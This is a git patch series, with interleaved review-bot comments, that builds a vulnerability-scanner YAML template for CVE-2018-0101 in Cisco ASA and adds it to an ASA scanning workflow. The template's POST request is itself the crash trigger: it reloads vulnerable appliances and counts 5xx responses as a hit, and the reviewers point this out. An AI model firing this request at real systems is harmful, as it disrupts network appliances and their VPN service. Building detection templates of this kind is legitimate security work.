From 7589706bfae89f7d28348cfaf83cc18fe0d79c5f Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:46:40 +0700 Subject: [PATCH 01/11] :fire: Add CVE-2018-0101 --- cves/2018/CVE-2018-0101.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2018/CVE-2018-0101.yaml diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml new file mode 100644 index 00000000000..c89da0ebb37 --- /dev/null +++ b/cves/2018/CVE-2018-0101.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-0101 + +info: + name: Cisco ASA Denial-of-Service # Leads to RCE + author: dwisiswant0 + severity: critical + description: | + A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, + remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that + the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. + tags: cve,cve2018,cisco,dos,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/" + headers: + Content-Type: "application/x-www-form-urlencoded" + X-Aggregate-Auth: "1" + X-Transcend-Version: "1" + Accept-Encoding: "identity" + X-AnyConnect-Platform: "linux-64" + X-Support-HTTP-Auth: "false" + X-Pad: "0000000000000000000000000000000000000000" + body: | + + + A + + + matchers: + - type: status + status: + - 500 \ No newline at end of file From f0c941a02f6d62e1cb0edb75a4d5fd8cffe505f5 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:47:01 +0700 Subject: [PATCH 02/11] Add reference --- cves/2018/CVE-2018-0101.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index c89da0ebb37..d7da097947f 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml 
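Review bot: The `description` of the new template never says that the template is itself the crash trigger: the POST with the `X-Aggregate-Auth` headers appears to be the malformed request the advisory text describes, and the `status: 500` matcher takes the appliance's error response as the hit, so a positive result is taken as evidence that the scanned ASA reloaded rather than that it was merely fingerprinted. That operational consequence currently lives only in the `# Leads to RCE` inline comment on `name`, which no consumer of the metadata sees. Proposed sentence to append to the `description` block: `This template sends the crash-triggering request itself; a match indicates the target reloaded and its VPN service was interrupted.`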
@@ -4,6 +4,7 @@ info: name: Cisco ASA Denial-of-Service # Leads to RCE author: dwisiswant0 severity: critical + reference: https://www.exploit-db.com/exploits/43986 description: | A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that From b8bf230aaff351059a26b1f0abc30e6804fc1986 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:47:38 +0700 Subject: [PATCH 03/11] Add possible crash 5xx status codes --- cves/2018/CVE-2018-0101.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index d7da097947f..a566649adfe 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -32,4 +32,8 @@ requests: matchers: - type: status status: - - 500 \ No newline at end of file + - 500 + - 501 + - 502 + - 503 + - 504 \ No newline at end of file From 2589645f7e5083ec8a82b13ef98945d7aebea00e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:48:46 +0700 Subject: [PATCH 04/11] Add CVE-2018-0101 to cisco-asa-workflow --- workflows/cisco-asa-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 455eb68e1c5..1cfe3751a3a 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -16,4 +16,5 @@ workflows: subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml - - template: cves/2018/CVE-2018-0296.yaml \ No newline at end of file + - template: cves/2018/CVE-2018-0296.yaml + - template: cves/2018/CVE-2018-0101.yaml \ No newline at end of file From 2a8cb0052527c5e438a24f348b64084cd3b523da Mon Sep 17 00:00:00 2001 
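Review bot: Adding 502, 503 and 504 to the `status` list widens the match to codes that are usually produced by a reverse proxy, load balancer or WAF in front of the appliance rather than by the ASA's own HTTP handler, so an upstream timeout or a gateway rejecting the unusual `X-*` headers now reports as a successful crash. The same five-code list reappears in the second `dsl` matcher of patch 10 (`status_code_2 == 500` through `504`) and the point applies there too. If the gateway codes are kept deliberately, record the reasoning next to the list, e.g. `# 502-504: the ASA may sit behind a proxy that surfaces its reload as an upstream failure`, and confirm against a real appliance which code its own handler returns so the list can be trimmed.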
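Review bot: The new subtemplate entry adds an active denial-of-service check to `cisco-asa-workflow.yaml`, so anyone running the workflow for inventory or for the other CVE checks in the same list now reloads every vulnerable ASA as a side effect, and nothing in the workflow file signals that. A line above the entry such as `# CVE-2018-0101 triggers the crash it tests for - expect a reload on vulnerable hosts` would let operators decide whether to exclude it from routine runs. Whether the workflow's parent template gates these subtemplates on an ASA fingerprint is outside this hunk, which starts at the `subtemplates` list.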
From: Dwi Siswanto Date: Wed, 10 Mar 2021 20:33:23 +0700 Subject: [PATCH 05/11] Add matcher condition to 'or' --- cves/2018/CVE-2018-0101.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index a566649adfe..fb47a97caa7 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -36,4 +36,5 @@ requests: - 501 - 502 - 503 - - 504 \ No newline at end of file + - 504 + condition: or \ No newline at end of file From e80e67a59215bf6a6b201b9cee9b471f2d0d6802 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:06:04 +0700 Subject: [PATCH 06/11] Using RAW requests --- cves/2018/CVE-2018-0101.yaml | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index fb47a97caa7..03bec56569e 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -12,18 +12,24 @@ info: tags: cve,cve2018,cisco,dos,rce requests: - - method: POST - path: - - "{{BaseURL}}/" - headers: - Content-Type: "application/x-www-form-urlencoded" - X-Aggregate-Auth: "1" - X-Transcend-Version: "1" - Accept-Encoding: "identity" - X-AnyConnect-Platform: "linux-64" - X-Support-HTTP-Auth: "false" - X-Pad: "0000000000000000000000000000000000000000" - body: | + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 + A From 53d8ab832249b32a48d996a2c178f2323adb88bc Mon Sep 17 00:00:00 2001 
From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:06:37 +0700 Subject: [PATCH 07/11] Using DSL type of matcher --- cves/2018/CVE-2018-0101.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 03bec56569e..4f8237783b6 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -36,11 +36,6 @@ requests: matchers: - - type: status - status: - - 500 - - 501 - - 502 - - 503 - - 504 - condition: or \ No newline at end of file + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 500" \ No newline at end of file From b804f5f6760abaa27a325ed192dff789e07fe382 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:07:23 +0700 Subject: [PATCH 08/11] Add more possible crash 5xx status codes --- cves/2018/CVE-2018-0101.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 4f8237783b6..c4eeec855bd 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -38,4 +38,4 @@ requests: matchers: - type: dsl dsl: - - "status_code_1 == 200 && status_code_2 == 500" \ No newline at end of file + - "status_code_1 == 200 && status_code_2 == 500 || status_code_2 == 501 || status_code_2 == 502 || status_code_2 == 503 || status_code_2 == 504" \ No newline at end of file From 2925d53ab9b2f70d5a639e15ebbe3dfc9c95cfe6 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:09:26 +0700 Subject: [PATCH 09/11] Fix wrong identations --- cves/2018/CVE-2018-0101.yaml | 38 ++++++++++++++++++------------------ 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index c4eeec855bd..578e4527c22 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml 
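Review bot: The new DSL condition hard-codes `status_code_1 == 200` for the baseline `GET /`, but an ASA WebVPN portal commonly answers the root path with a redirect to its logon page rather than 200, which would make the check never fire on the very devices it targets; this should be confirmed against a real appliance before the baseline status is fixed. A more robust baseline is to require only that the first response is not itself a server error, e.g. `- "status_code_1 < 500 && status_code_2 == 500"`, which keeps the sanity check without assuming the portal's exact status. The `raw` requests that `status_code_1` and `status_code_2` refer to are defined above this hunk.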
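Review bot: The extended expression `status_code_1 == 200 && status_code_2 == 500 || status_code_2 == 501 || …` binds `&&` tighter than `||`, so the baseline check guards only the 500 case and any 501–504 on the second response matches regardless of what the GET returned. The fix is to parenthesize the alternatives: `- "status_code_1 == 200 && (status_code_2 == 500 || status_code_2 == 501 || status_code_2 == 502 || status_code_2 == 503 || status_code_2 == 504)"`. Patch 10 in this series later splits the predicate into two matchers joined by `matchers-condition: and`, which removes the precedence problem, so this note only matters if the intermediate revision is ever used on its own.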
@@ -13,27 +13,27 @@ info: requests: - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - X-Aggregate-Auth: 1 - X-Transcend-Version: 1 - Accept-Encoding: identity - X-AnyConnect-Platform: linux-64 - X-Support-HTTP-Auth: false - X-Pad: 0000000000000000000000000000000000000000 + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 - - - A - + + + A + matchers: - type: dsl From b7efe0b3c9b4661c068e35fdff8f6986caeea386 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 1 Apr 2021 13:59:23 +0530 Subject: [PATCH 10/11] minor fixes and improvements --- cves/2018/CVE-2018-0101.yaml | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 578e4527c22..b918267771f 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -35,7 +35,19 @@ requests: A + req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - - "status_code_1 == 200 && status_code_2 == 500 || status_code_2 == 501 || status_code_2 == 502 || status_code_2 == 503 || status_code_2 == 504" \ No newline at end of file + - "status_code_1 == 200" + + - type: dsl + dsl: + - "status_code_2 == 500" + - "status_code_2 == 501" + - "status_code_2 == 502" + - "status_code_2 == 503" + - "status_code_2 == 504" + condition: or + From 06827e41c947f8f96e194672b2cd84082663a29c Mon Sep 17 00:00:00 2001 
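Review bot: The two `dsl` matchers combined through `matchers-condition: and` plus a five-entry `condition: or` list express a single predicate that reads more clearly as one expression, e.g. `- "status_code_1 == 200 && status_code_2 >= 500 && status_code_2 <= 504"`, which states the intent (healthy baseline, any 5xx on the crash request) in one place. Either form would benefit from a comment above `req-condition: true` noting that this flag is what makes both responses available to the DSL under the `status_code_1` / `status_code_2` names, since a reader of the matcher block alone cannot tell where those variables come from. The `raw` requests they refer to begin above this hunk.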
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 1 Apr 2021 14:01:09 +0530 Subject: [PATCH 11/11] Update CVE-2018-0101.yaml --- cves/2018/CVE-2018-0101.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index b918267771f..8448e3c2f62 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -49,5 +49,4 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or - + condition: or \ No newline at end of file